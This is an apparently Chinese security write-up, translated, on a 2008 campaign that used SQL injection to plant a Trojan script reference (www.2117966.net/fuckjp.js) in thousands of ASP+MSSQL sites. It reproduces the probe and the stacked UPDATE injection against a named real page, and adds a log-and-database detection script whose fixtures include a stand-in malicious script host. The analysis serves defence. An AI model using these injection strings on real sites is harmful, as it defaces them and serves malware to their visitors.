BY: rayh4c.cn
I. First reports of the attack on the Internet
http://www.2cto.com/OS/200803/24504.html
http://www.nsfocus.net/news/6697
http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html
Related compromised pages can be found through Google:
http://www.google.cn/search?hl=zh-CN&q=site%3Atrendmicro.com+www.2117966.net+fuckjp.js&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f
Pages on trendmicro.com had been injected with a reference to the malicious script http://www.2117966.net/fuckjp.js.
II. Searching directly for the injected script
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net+fuckjp.js&meta=&aq=f
About 12,500 matching results were returned, all of them pages into which the malicious JavaScript reference had been inserted.
Analysis of the compromised pages shows the following common features:
1. The compromised websites all run on an ASP + MSSQL architecture.
2. The modified pages all contain an SQL injection vulnerability.
III. Reproducing the SQL injection against one of the infected pages
1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?Person=5162
This link has an obvious SQL injection flaw. Appending "having 1=1" to the Person parameter makes the server's error message reveal the table name used at the injection point, Coordinator, together with the column name ShCoordinatorSurame:
http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?Person=5162 having 1=1
------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Coordinator.ShCoordinatorSurame' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
-------------------
2. Using the exposed table and column names, a stacked UPDATE statement overwrites the column's content with the JavaScript reference that loads the Trojan:
http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?Person=5162;update Coordinator set ShCoordinatorSurame= where 1=1 --
This modifies the ShCoordinatorSurame column of the Coordinator table; because the condition 1=1 is always true, every row that the page queries and displays is changed.
So a page with an SQL injection point can be made to serve the Trojan directly.
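The two indicators described above, the "having 1=1" probe and the stacked ";update ... --" statement, can be picked out of IIS logs, and the stored result can be found by scanning text columns for external script references. The following is an added detection example, not code from the original post; the W3C field layout, log lines, rows and the host malicious.example are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators from this campaign: a "having 1=1" probe that makes SQL Server leak a table
# and column name, then a stacked ";update ... --" statement through a numeric parameter.
PROBE = re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I)
STACKED_STMT = re.compile(r";\s*(update|insert|exec|declare)\b", re.I)
# An external <script src=...> reference stored in a database text column.
INJECTED_SCRIPT = re.compile(r"<script[^>]+src\s*=\s*[\"']?(https?://[^\s\"'>]+)", re.I)

def suspicious_query(raw_query):
    """Return the injection indicators found in one URL-encoded query string."""
    decoded = unquote_plus(raw_query)  # %3B -> ';', '+' -> ' ', %3D -> '='
    hits = []
    if PROBE.search(decoded):
        hits.append("having-probe")
    if STACKED_STMT.search(decoded):
        hits.append("stacked-statement")
    return hits

def scan_iis_log(lines):
    """Yield (client_ip, uri_stem, indicators) for lines carrying an indicator."""
    # Constructed W3C layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue  # skip W3C directives and blank lines
        f = line.split(" ")
        hits = suspicious_query(f[5]) if len(f) >= 7 else []
        if hits:
            yield f[2], f[4], hits

def find_injected_scripts(rows):
    """Return (column, script URL) pairs for external scripts stored in text columns."""
    found = []
    for row in rows:
        for col, val in row.items():
            for m in INJECTED_SCRIPT.finditer(str(val)):
                found.append((col, m.group(1)))
    return found

# Constructed sample data (not from the original post); the script host is a placeholder.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-03-14 02:11:05 10.0.0.7 GET /StrPersonOverview.asp Person=5162 200
2008-03-14 02:11:09 10.0.0.7 GET /StrPersonOverview.asp Person=5162+having+1%3D1 500
2008-03-14 02:11:14 10.0.0.7 GET /StrPersonOverview.asp Person=5162%3Bupdate+Coordinator+set+ShCoordinatorSurame%3D'x'+where+1%3D1-- 200
""".splitlines()
SAMPLE_ROWS = [
    {"ShCoordinatorSurame": "Smith"},
    {"ShCoordinatorSurame": "Jones<script src=http://malicious.example/x.js></script>"},
]
```

Running scan_iis_log(SAMPLE_LOG) flags the second and third requests; find_injected_scripts(SAMPLE_ROWS) reports the column and script URL stored in the second row.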
IV. Summary
This large-scale attack was most likely automated:
1. Batch scanning to collect SQL injection vulnerabilities across tens of thousands of websites.
2. Automated exploitation of those vulnerabilities to inject the Trojan reference into the database.
Although SQL injection is a very old vulnerability, the attackers' ability to compromise and Trojan the HiChina websites within a single day is remarkable, and even a security company like Trend Micro was not spared.